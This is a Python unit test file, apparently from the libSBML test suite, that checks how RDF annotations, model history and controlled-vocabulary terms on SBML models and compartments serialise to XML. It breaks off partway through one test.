def test_SyncAnnotation_modifyCVTerms_2(self):
self.m.unsetCVTerms()
expected = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000001\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) )
pass
def test_SyncAnnotation_modifyCVTerms_3(self):
cv = self.m.getCVTerm(0).clone()
self.m.unsetCVTerms()
self.m.addCVTerm(cv)
expected = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000001\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) )
pass
def test_SyncAnnotation_modifyCVTerms_4(self):
cv = self.m.getCVTerm(0).clone()
c = self.m.getCompartment(0)
c.addCVTerm(cv)
expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyCVTerms_5(self):
c = self.m.getCompartment(6)
cv = c.getCVTerm(0).clone()
c.unsetCVTerms()
c.addCVTerm(cv)
expected = wrapString("<compartment metaid=\"_000042\" id=\"cc1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000042\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description/>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyHistory_1(self):
c = self.m.getCompartment(3)
mh = c.getModelHistory().clone()
c.unsetModelHistory()
c.setModelHistory(mh)
expected = wrapString("<compartment metaid=\"_000004\" id=\"C\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000004\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyHistory_2(self):
self.m.unsetModelHistory()
expected = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000001\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) )
pass
def test_SyncAnnotation_modifyHistory_3(self):
mh = self.m.getModelHistory().clone()
self.m.unsetModelHistory()
self.m.setModelHistory(mh)
expected = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000001\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) )
pass
def test_SyncAnnotation_modifyHistory_4(self):
c = self.m.getCompartment(0)
mh = self.m.getModelHistory().clone()
c.setModelHistory(mh)
expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyHistory_5(self):
c = self.m.getCompartment(5)
mh = c.getModelHistory().clone()
c.unsetModelHistory()
c.setModelHistory(mh)
expected = wrapString("<compartment metaid=\"_000032\" id=\"C1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000032\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_noChanges_1(self):
c = self.m.getCompartment(1)
expected = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_noChanges_2(self):
expected = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000001\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) )
pass
def test_SyncAnnotation_stringChangesMetaid(self):
c = libsbml.Compartment(3,1)
c.setMetaId("_000005")
c.setId("A")
addedAnn = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
c.setAnnotation(addedAnn)
expected = wrapString("<compartment metaid=\"_000005\" id=\"A\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_stringChangesMetaid_1(self):
c = libsbml.Model(2, 3)
c.setMetaId("_000005")
c.setId("A")
addedAnn = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
c.setAnnotation(addedAnn)
expected = wrapString("<model metaid=\"_000005\" id=\"A\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <dc:creator rdf:parseType=\"Resource\">\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</model>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_stringChangesMetaid_2(self):
c = libsbml.Compartment(2,3)
c.setMetaId("_000005")
c.setId("A")
addedAnn = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
c.setAnnotation(addedAnn)
expected = wrapString("<compartment metaid=\"_000005\" id=\"A\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_stringChangesMetaid_3(self):
c = libsbml.Model(3,1)
c.setMetaId("_000005")
c.setId("A")
addedAnn = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
